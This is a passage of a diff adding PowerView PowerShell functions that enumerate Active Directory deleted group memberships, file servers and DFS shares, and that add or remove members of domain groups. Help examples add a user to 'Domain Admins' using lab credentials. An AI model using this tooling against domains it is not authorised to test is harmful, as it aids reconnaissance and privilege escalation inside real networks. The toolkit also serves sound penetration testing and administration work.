Noteproperty 'MemberObjectClass' $MemberObjectClass + $GroupMember | Add-Member Noteproperty 'MemberSID' $MemberSID + $GroupMember.PSObject.TypeNames.Insert(0, 'PowerView.GroupMember') + $GroupMember + + # if we're doing manual recursion + if ($PSBoundParameters['Recurse'] -and $MemberDN -and ($MemberObjectClass -match 'group')) { + Write-Verbose "[Get-DomainGroupMember] Manually recursing on group: $MemberDN" + $SearcherArguments['Identity'] = $MemberDN + $Null = $SearcherArguments.Remove('Properties') + Get-DomainGroupMember @SearcherArguments + } + } + } + $GroupSearcher.dispose() + } + } +} + + +function Get-DomainGroupMemberDeleted { +<# +.SYNOPSIS + +Returns information on group members that were removed from the specified +group identity. Accomplished by searching the linked attribute replication +metadata for the group using Get-DomainObjectLinkedAttributeHistory. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObjectLinkedAttributeHistory + +.DESCRIPTION + +Wraps Get-DomainObjectLinkedAttributeHistory to return the linked attribute +replication metadata for the specified group. These are cases where the +'Version' attribute of group member in the replication metadata is even. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainGroupMemberDeleted | Group-Object GroupDN + +Count Name Group +----- ---- ----- + 2 CN=Domain Admins,CN=Us... {@{GroupDN=CN=Domain Admins,CN=Users,DC=test... + 3 CN=DomainLocalGroup,CN... {@{GroupDN=CN=DomainLocalGroup,CN=Users,DC=t... + +.EXAMPLE + +Get-DomainGroupMemberDeleted "Domain Admins" -Domain testlab.local + + +GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +MemberDN : CN=testuser,CN=Users,DC=testlab,DC=local +TimeFirstAdded : 2017-06-13T23:07:43Z +TimeDeleted : 2017-06-13T23:26:17Z +LastOriginatingChange : 2017-06-13T23:26:17Z +TimesAdded : 2 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +GroupDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +MemberDN : CN=dfm,CN=Users,DC=testlab,DC=local +TimeFirstAdded : 2017-06-13T22:20:02Z +TimeDeleted : 2017-06-13T23:26:17Z +LastOriginatingChange : 2017-06-13T23:26:17Z +TimesAdded : 5 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.OUTPUTS + +PowerView.DomainGroupMemberDeleted + +Custom PSObject with translated replication metadata fields. + +.LINK + +https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.DomainGroupMemberDeleted')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'msds-replvaluemetadata','distinguishedname' + 'Raw' = $True + 'LDAPFilter' = '(objectCategory=group)' + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainObject @SearcherArguments | ForEach-Object { + $ObjectDN = $_.Properties['distinguishedname'][0] + ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) { + $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue + if ($TempObject) { + if (($TempObject.pszAttributeName -Match 'member') -and (($TempObject.dwVersion % 2) -eq 0 )) { + $Output = New-Object PSObject + $Output | Add-Member NoteProperty 'GroupDN' $ObjectDN + $Output | Add-Member NoteProperty 'MemberDN' $TempObject.pszObjectDn + $Output | Add-Member NoteProperty 'TimeFirstAdded' $TempObject.ftimeCreated + $Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted + $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange + $Output | Add-Member NoteProperty 'TimesAdded' ($TempObject.dwVersion / 2) + $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN + $Output.PSObject.TypeNames.Insert(0, 'PowerView.DomainGroupMemberDeleted') + $Output + } + } + else { + Write-Verbose "[Get-DomainGroupMemberDeleted] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'" + } + } + } + } +} + + +function Add-DomainGroupMember { +<# +.SYNOPSIS + +Adds a domain user (or group) to an existing domain group, assuming +appropriate permissions to do so. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified -GroupIdentity, +which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For +each entry in -Members, each member identity is similarly searched for and added +to the group. + +.PARAMETER Identity + +A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to add members to. + +.PARAMETER Members + +One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName +(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), +or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202). + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' + +Adds harmj0y to 'Domain Admins' in the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred + +Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('GroupName', 'GroupIdentity')] + [String] + $Identity, + + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('MemberIdentity', 'Member', 'DistinguishedName')] + [String[]] + $Members, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ContextArguments = @{ + 'Identity' = $Identity + } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + + $GroupContext = Get-PrincipalContext @ContextArguments + + if ($GroupContext) { + try { + $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity) + } + catch { + Write-Warning "[Add-DomainGroupMember] Error finding the group identity '$Identity' : $_" + } + } + } + + PROCESS { + if ($Group) { + ForEach ($Member in $Members) { + if ($Member -match '.+\\.+') { + $ContextArguments['Identity'] = $Member + $UserContext = Get-PrincipalContext @ContextArguments + if ($UserContext) { + $UserIdentity = $UserContext.Identity + } + } + else { + $UserContext = $GroupContext + $UserIdentity = $Member + } + Write-Verbose "[Add-DomainGroupMember] Adding member '$Member' to group '$Identity'" + $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity) + $Group.Members.Add($Member) + $Group.Save() + } + } + } +} + + +function Remove-DomainGroupMember { +<# +.SYNOPSIS + +Removes a domain user (or group) from an existing domain group, assuming +appropriate permissions to do so. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +.DESCRIPTION + +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified -GroupIdentity, +which returns a DirectoryServices.AccountManagement.GroupPrincipal object. For +each entry in -Members, each member identity is similarly searched for and removed +from the group. + +.PARAMETER Identity + +A group SamAccountName (e.g. Group1), DistinguishedName (e.g. CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to remove members from. + +.PARAMETER Members + +One or more member identities, i.e. SamAccountName (e.g. Group1), DistinguishedName +(e.g. CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1114), +or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d202). + +.PARAMETER Domain + +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Remove-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' + +Removes harmj0y from 'Domain Admins' in the current domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Remove-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred + +Removes harmj0y from 'Domain Admins' in the current domain using the alternate credentials. + +.LINK + +http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True)] + [Alias('GroupName', 'GroupIdentity')] + [String] + $Identity, + + [Parameter(Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('MemberIdentity', 'Member', 'DistinguishedName')] + [String[]] + $Members, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $ContextArguments = @{ + 'Identity' = $Identity + } + if ($PSBoundParameters['Domain']) { $ContextArguments['Domain'] = $Domain } + if ($PSBoundParameters['Credential']) { $ContextArguments['Credential'] = $Credential } + + $GroupContext = Get-PrincipalContext @ContextArguments + + if ($GroupContext) { + try { + $Group = [System.DirectoryServices.AccountManagement.GroupPrincipal]::FindByIdentity($GroupContext.Context, $GroupContext.Identity) + } + catch { + Write-Warning "[Remove-DomainGroupMember] Error finding the group identity '$Identity' : $_" + } + } + } + + PROCESS { + if ($Group) { + ForEach ($Member in $Members) { + if ($Member -match '.+\\.+') { + $ContextArguments['Identity'] = $Member + $UserContext = Get-PrincipalContext @ContextArguments + if ($UserContext) { + $UserIdentity = $UserContext.Identity + } + } + else { + $UserContext = $GroupContext + $UserIdentity = $Member + } + Write-Verbose "[Remove-DomainGroupMember] Removing member '$Member' from group '$Identity'" + $Member = [System.DirectoryServices.AccountManagement.Principal]::FindByIdentity($UserContext.Context, $UserIdentity) + $Group.Members.Remove($Member) + $Group.Save() + } + } + } +} + + +function Get-DomainFileServer { +<# +.SYNOPSIS + +Returns a list of servers likely functioning as file servers. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +.DESCRIPTION + +Returns a list of likely fileservers by searching for all users in Active Directory +with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying +the server names. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainFileServer + +Returns active file servers for the current domain. + +.EXAMPLE + +Get-DomainFileServer -Domain testing.local + +Returns active file servers for the 'testing.local' domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainFileServer -Credential $Cred + +.OUTPUTS + +String + +One or more strings representing file server names. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType([String])] + [CmdletBinding()] + Param( + [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [Alias('DomainName', 'Name')] + [String[]] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + function Split-Path { + # short internal helper to split UNC server paths + Param([String]$Path) + + if ($Path -and ($Path.split('\\').Count -ge 3)) { + $Temp = $Path.split('\\')[2] + if ($Temp -and ($Temp -ne '')) { + $Temp + } + } + } + + $SearcherArguments = @{ + 'LDAPFilter' = '(&(samAccountType=805306368)(!(userAccountControl:1.2.840.113556.1.4.803:=2))(|(homedirectory=*)(scriptpath=*)(profilepath=*)))' + 'Properties' = 'homedirectory,scriptpath,profilepath' + } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Domain']) { + ForEach ($TargetDomain in $Domain) { + $SearcherArguments['Domain'] = $TargetDomain + $UserSearcher = Get-DomainSearcher @SearcherArguments + # get all results w/o the pipeline and uniquify them (I know it's not pretty) + $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique + } + } + else { + $UserSearcher = Get-DomainSearcher @SearcherArguments + $(ForEach($UserResult in $UserSearcher.FindAll()) {if ($UserResult.Properties['homedirectory']) {Split-Path($UserResult.Properties['homedirectory'])}if ($UserResult.Properties['scriptpath']) {Split-Path($UserResult.Properties['scriptpath'])}if ($UserResult.Properties['profilepath']) {Split-Path($UserResult.Properties['profilepath'])}}) | Sort-Object -Unique + } + } +} + + +function Get-DomainDFSShare { +<# +.SYNOPSIS + +Returns a list of all fault-tolerant distributed file systems +for the current (or specified) domains. + +Author: Ben Campbell (@meatballs__) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher + +.DESCRIPTION + +This function searches for all distributed file systems (either version +1, 2, or both depending on -Version X) by searching for domain objects +matching (objectClass=fTDfs) or (objectClass=msDFS-Linkv2), respectively +The server data is parsed appropriately and returned. + +.PARAMETER Domain + +Specifies the domains to use for the query, defaults to the current domain. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainDFSShare + +Returns all distributed file system shares for the current domain. + +.EXAMPLE + +Get-DomainDFSShare -Domain testlab.local + +Returns all distributed file system shares for the 'testlab.local' domain. + +.EXAMPLE + +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainDFSShare -Credential $Cred + +.OUTPUTS + +System.Management.Automation.PSCustomObject + +A custom PSObject describing the distributed file systems. +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseApprovedVerbs', '')] + [OutputType('System.Management.Automation.PSCustomObject')] + [CmdletBinding()] + Param( + [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [Alias('DomainName', 'Name')] + [String[]] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [ValidateSet('All', 'V1', '1', 'V2', '2')] + [String] + $Version = 'All' + ) + + BEGIN { + $SearcherArguments = @{} + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + function Parse-Pkt { + [CmdletBinding()] + Param( + [Byte[]] + $Pkt + ) + + $bin = $Pkt + $blob_version = [bitconverter]::ToUInt32($bin[0..3],0) + $blob_element_count = [bitconverter]::ToUInt32($bin[4..7],0) + $offset = 8 + #https://msdn.microsoft.com/en-us/library/cc227147.aspx + $object_list = @() + for($i=1; $i -le $blob_element_count; $i++){ + $blob_name_size_start = $offset + $blob_name_size_end = $offset + 1 + $blob_name_size = [bitconverter]::ToUInt16($bin[$blob_name_size_start..$blob_name_size_end],0) + + $blob_name_start = $blob_name_size_end + 1 + $blob_name_end = $blob_name_start + $blob_name_size - 1 + $blob_name = [System.Text.Encoding]::Unicode.GetString($bin[$blob_name_start..$blob_name_end]) + + $blob_data_size_start = $blob_name_end + 1 + $blob_data_size_end = $blob_data_size_start + 3 + $blob_data_size = [bitconverter]::ToUInt32($bin[$blob_data_size_start..$blob_data_size_end],0) + + $blob_data_start = $blob_data_size_end + 1 + $blob_data_end = $blob_data_start + $blob_data_size - 1 + $blob_data = $bin[$blob_data_start..$blob_data_end] + switch -wildcard ($blob_name) { + "\siteroot" { } + "\domainroot*" { + # Parse DFSNamespaceRootOrLinkBlob object. Starts with variable length DFSRootOrLinkIDBlob which we parse first... + # DFSRootOrLinkIDBlob + $root_or_link_guid_start = 0 + $root_or_link_guid_end = 15 + $root_or_link_guid = [byte[]]$blob_data[$root_or_link_guid_start..$root_or_link_guid_end] + $guid = New-Object Guid(,$root_or_link_guid) # should match $guid_str + $prefix_size_start = $root_or_link_guid_end + 1 + $prefix_size_end = $prefix_size_start + 1 + $prefix_size = [bitconverter]::ToUInt16($blob_data[$prefix_size_start..$prefix_size_end],0) + $prefix_start = $prefix_size_end + 1 + $prefix_end = $prefix_start + $prefix_size - 1 + $prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$prefix_start..$prefix_end]) + + $short_prefix_size_start = $prefix_end + 1 + $short_prefix_size_end = $short_prefix_size_start + 1 + $short_prefix_size = [bitconverter]::ToUInt16($blob_data[$short_prefix_size_start..$short_prefix_size_end],0) + $short_prefix_start = $short_prefix_size_end + 1 + $short_prefix_end = $short_prefix_start + $short_prefix_size - 1 + $short_prefix = [System.Text.Encoding]::Unicode.GetString($blob_data[$short_prefix_start..$short_prefix_end]) + + $type_start = $short_prefix_end + 1 + $type_end = $type_start + 3 + $type = [bitconverter]::ToUInt32($blob_data[$type_start..$type_end],0) + + $state_start = $type_end + 1 + $state_end = $state_start + 3 + $state = [bitconverter]::ToUInt32($blob_data[$state_start..$state_end],0) + + $comment_size_start = $state_end + 1 + $comment_size_end = $comment_size_start + 1 + $comment_size = [bitconverter]::ToUInt16($blob_data[$comment_size_start..$comment_size_end],0) + $comment_start = $comment_size_end + 1 + $comment_end = $comment_start + $comment_size - 1 + if ($comment_size -gt 0) { + $comment = [System.Text.Encoding]::Unicode.GetString($blob_data[$comment_start..$comment_end]) + } + $prefix_timestamp_start = $comment_end + 1 + $prefix_timestamp_end = $prefix_timestamp_start + 7 + # https://msdn.microsoft.com/en-us/library/cc230324.aspx FILETIME + $prefix_timestamp = $blob_data[$prefix_timestamp_start..$prefix_timestamp_end] #dword lowDateTime #dword highdatetime + $state_timestamp_start = $prefix_timestamp_end + 1 + $state_timestamp_end = $state_timestamp_start + 7 + $state_timestamp = $blob_data[$state_timestamp_start..$state_timestamp_end] + $comment_timestamp_start = $state_timestamp_end + 1 + $comment_timestamp_end = $comment_timestamp_start + 7 + $comment_timestamp = $blob_data[$comment_timestamp_start..$comment_timestamp_end] + $version_start = $comment_timestamp_end + 1 + $version_end = $version_start + 3 + $version = [bitconverter]::ToUInt32($blob_data[$version_start..$version_end],0) + + # Parse rest of DFSNamespaceRootOrLinkBlob here + $dfs_targetlist_blob_size_start = $version_end + 1 + $dfs_targetlist_blob_size_end = $dfs_targetlist_blob_size_start + 3 + $dfs_targetlist_blob_size = [bitconverter]::ToUInt32($blob_data[$dfs_targetlist_blob_size_start..$dfs_targetlist_blob_size_end],0) + + $dfs_targetlist_blob_start = $dfs_targetlist_blob_size_end + 1 + $dfs_targetlist_blob_end = $dfs_targetlist_blob_start + $dfs_targetlist_blob_size - 1 + $dfs_targetlist_blob = $blob_data[$dfs_targetlist_blob_start..$dfs_targetlist_blob_end] + $reserved_blob_size_start = $dfs_targetlist_blob_end + 1 + $reserved_blob_size_end = $reserved_blob_size_start + 3 + $reserved_blob_size = [bitconverter]::ToUInt32($blob_data[$reserved_blob_size_start..$reserved_blob_size_end],0) + + $reserved_blob_start = $reserved_blob_size_end + 1 + $reserved_blob_end = $reserved_blob_start + $reserved_blob_size - 1 + $reserved_blob = $blob_data[$reserved_blob_start..$reserved_blob_end] + $referral_ttl_start = $reserved_blob_end + 1 + $referral_ttl_end = $referral_ttl_start + 3 + $referral_ttl = [bitconverter]::ToUInt32($blob_data[$referral_ttl_start..$referral_ttl_end],0) + + #Parse DFSTargetListBlob + $target_count_start = 0 + $target_count_end = $target_count_start + 3 + $target_count = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_count_start..$target_count_end],0) + $t_offset = $target_count_end + 1 + + for($j=1; $j -le $target_count; $j++){ + $target_entry_size_start = $t_offset + $target_entry_size_end = $target_entry_size_start + 3 + $target_entry_size = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_entry_size_start..$target_entry_size_end],0) + $target_time_stamp_start = $target_entry_size_end + 1 + $target_time_stamp_end = $target_time_stamp_start + 7 + # FILETIME again or special if priority rank and priority class 0 + $target_time_stamp = $dfs_targetlist_blob[$target_time_stamp_start..$target_time_stamp_end] + $target_state_start = $target_time_stamp_end + 1 + $target_state_end = $target_state_start + 3 + $target_state = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_state_start..$target_state_end],0) + + $target_type_start = $target_state_end + 1 + $target_type_end = $target_type_start + 3 + $target_type = [bitconverter]::ToUInt32($dfs_targetlist_blob[$target_type_start..$target_type_end],0) + + $server_name_size_start = $target_type_end + 1 + $server_name_size_end = $server_name_size_start + 1 + $server_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$server_name_size_start..$server_name_size_end],0) + + $server_name_start = $server_name_size_end + 1 + $server_name_end = $server_name_start + $server_name_size - 1 + $server_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$server_name_start..$server_name_end]) + + $share_name_size_start = $server_name_end + 1 + $share_name_size_end = $share_name_size_start + 1 + $share_name_size = [bitconverter]::ToUInt16($dfs_targetlist_blob[$share_name_size_start..$share_name_size_end],0) + $share_name_start = $share_name_size_end + 1 + $share_name_end = $share_name_start + $share_name_size - 1 + $share_name = [System.Text.Encoding]::Unicode.GetString($dfs_targetlist_blob[$share_name_start..$share_name_end]) + + $target_list += "\\$server_name\$share_name" + $t_offset = $share_name_end + 1 + } + } + } + $offset = $blob_data_end + 1 + 